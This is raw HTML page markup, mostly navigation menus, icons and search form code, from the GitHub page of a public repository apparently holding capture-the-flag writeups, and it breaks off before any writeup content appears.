0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div> <svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div> Explore All features Documentation <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> GitHub Skills <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Blog <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For Enterprise Teams Startups Education <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> By Solution CI/CD & Automation DevOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> DevSecOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> Case Studies Customer Stories Resources <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg> </div> <button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> <div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div> <div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div> Repositories Topics Trending Collections </div> Pricing </nav> <div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0"> <div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="481769760" data-scoped-search-url="/not1cyyy/CTF-Writeups/search" data-owner-scoped-search-url="/users/not1cyyy/search" data-unscoped-search-url="/search" data-turbo="false" action="/not1cyyy/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="s/C9rnyE0iXsg7SLV+RzsbtlKTg3K1z83NWFkMhgQzMrl87NhsVMa6GqvAMaKwNGVm05lj+E6DtUQGS0IcmtvQ==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <span>No suggested jump to results</span> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div> <div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div> </div> </label></form> </div></div> </div> <div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div> Sign up </div> </div> </div> </div></header> </div> <div id="start-of-content" class="show-on-focus"></div> <div id="js-flash-container" data-turbo-replace> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div> </div> </div></div> </template></div> <include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment> <div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" > <div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace> <div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;"> <div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> not1cyyy </span> <span>/</span> CTF-Writeups <span></span><span>Public</span> </div> </div> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span> <div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>7</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div> </div> <div id="responsive-meta-container" data-turbo-replace></div> <nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 